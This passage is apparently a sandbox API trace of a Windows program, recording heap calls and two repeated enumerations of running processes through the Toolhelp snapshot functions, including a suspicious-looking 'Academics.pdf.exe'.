Size=0x8) returned 0x24b2bb8 [0304.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.408] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.409] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.410] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.411] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.412] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.413] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.414] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.415] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.416] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.417] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.418] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0304.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.447] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.448] CloseHandle (hObject=0x294) returned 1 [0304.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.448] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.448] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.451] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 